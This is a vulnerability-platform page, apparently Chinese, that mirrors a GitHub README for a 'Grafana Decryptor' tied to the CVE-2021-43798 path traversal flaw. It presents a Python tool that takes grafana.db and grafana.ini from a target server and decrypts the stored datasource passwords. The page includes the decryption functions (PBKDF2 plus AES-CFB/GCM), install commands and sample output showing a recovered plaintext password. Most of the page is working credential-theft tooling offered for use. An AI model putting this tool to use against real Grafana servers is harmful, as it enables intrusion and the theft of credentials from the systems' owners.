漏洞平台

POC详情： aa3d07d57308685487430e3ec27a0e63b7f0b4a7

来源

https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798

关联漏洞

标题： Grafana 路径遍历漏洞 (CVE-2021-43798)
描述：Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞，攻击者可利用该漏洞执行目录遍历攻击，访问本地文件。

描述

Grafana Decryptor for CVE-2021-43798

介绍


# Grafana Decryptor for CVE-2021-43798

This script decrypts the DataSource passwords from a Grafana instance vulnerable to CVE-2021-43798, which allows unauthorized arbitrary file reading.

## Description

Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a directory traversal vulnerability that allows unauthorized users to read arbitrary files on the server. This script exploits this vulnerability to decrypt DataSource passwords found in the `grafana.db` file using the `secret_key` found in the `grafana.ini` configuration file.

## Requirements

- Python 3.6+
- The following Python libraries:
  - `requests`
  - `questionary`
  - `termcolor`
  - `cryptography`

## Installation

1. Clone the repository or download the script.
2. Install the required Python libraries:
   ```bash
   pip install requests questionary termcolor cryptography
   ```

## Usage

1. Ensure you have the `grafana.db` and `grafana.ini` files from the target Grafana instance.
2. Run the script to decrypt the DataSource passwords.

### Example: Get the DataSource Password

```bash
python decrypt.py
```

### Example: Encrypt a Plaintext Password

You can also encode a plaintext password using the script by uncommenting the example code in the script.

## Script Details

### Deriving the Encryption Algorithm

The script determines the encryption algorithm used by analyzing the payload. The default encryption algorithm is `aes-cfb`.

### Decrypting the Password

Using the derived encryption algorithm and the `secret_key` from `grafana.ini`, the script decrypts the DataSource password.

### Encrypting a Password

The script also includes functionality to encrypt a plaintext password using the same encryption method and `secret_key`.

## Example Output

```
######################################
         GRAFANA DECRYPTOR
CVE-2021-43798 Grafana Unauthorized
arbitrary file reading vulnerability
            SICARI0
######################################

? Enter the datasource password: anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd
```

### Decryption and Encryption Functions

```python
def decrypt_gcm(block, payload):
    gcm = Cipher(algorithms.AES(block), modes.GCM(payload[SALT_LENGTH:SALT_LENGTH+12]), backend=default_backend()).decryptor()
    return gcm.update(payload[SALT_LENGTH+12:]) + gcm.finalize()

def decrypt_cfb(block, payload):
    if len(payload) < 16:
        raise ValueError("Payload too short")
    
    iv = payload[SALT_LENGTH:SALT_LENGTH+16]
    payload = payload[SALT_LENGTH+16:]
    decryptor = Cipher(algorithms.AES(block), modes.CFB(iv), backend=default_backend()).decryptor()
    return decryptor.update(payload) + decryptor.finalize()

def encryption_key_to_bytes(secret, salt):
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=10000,
        backend=default_backend()
    )
    return kdf.derive(secret.encode())

def decrypt(payload, secret):
    alg, payload = derive_encryption_algorithm(payload)
    
    if len(payload) < SALT_LENGTH:
        raise ValueError("Unable to compute salt")
    
    salt = payload[:SALT_LENGTH]
    key = encryption_key_to_bytes(secret, salt)
    
    block = algorithms.AES(key)
    
    if alg == AES_GCM:
        return decrypt_gcm(key, payload)
    else:
        return decrypt_cfb(key, payload)

def encrypt(payload, secret):
    salt = os.urandom(SALT_LENGTH)
    key = encryption_key_to_bytes(secret, salt)
    block = algorithms.AES(key)
    
    iv = os.urandom(16)
    encryptor = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend()).encryptor()
    encrypted = encryptor.update(payload) + encryptor.finalize()
    
    return salt + iv + encrypted
```

These functions handle the decryption and encryption processes.



## Contribution

Feel free to open issues or pull requests if you find any bugs or have suggestions for improvements.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

文件快照


 [4.0K]  /data/pocs/aa3d07d57308685487430e3ec27a0e63b7f0b4a7
├── [4.5K]  decrypt.py
└── [4.1K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。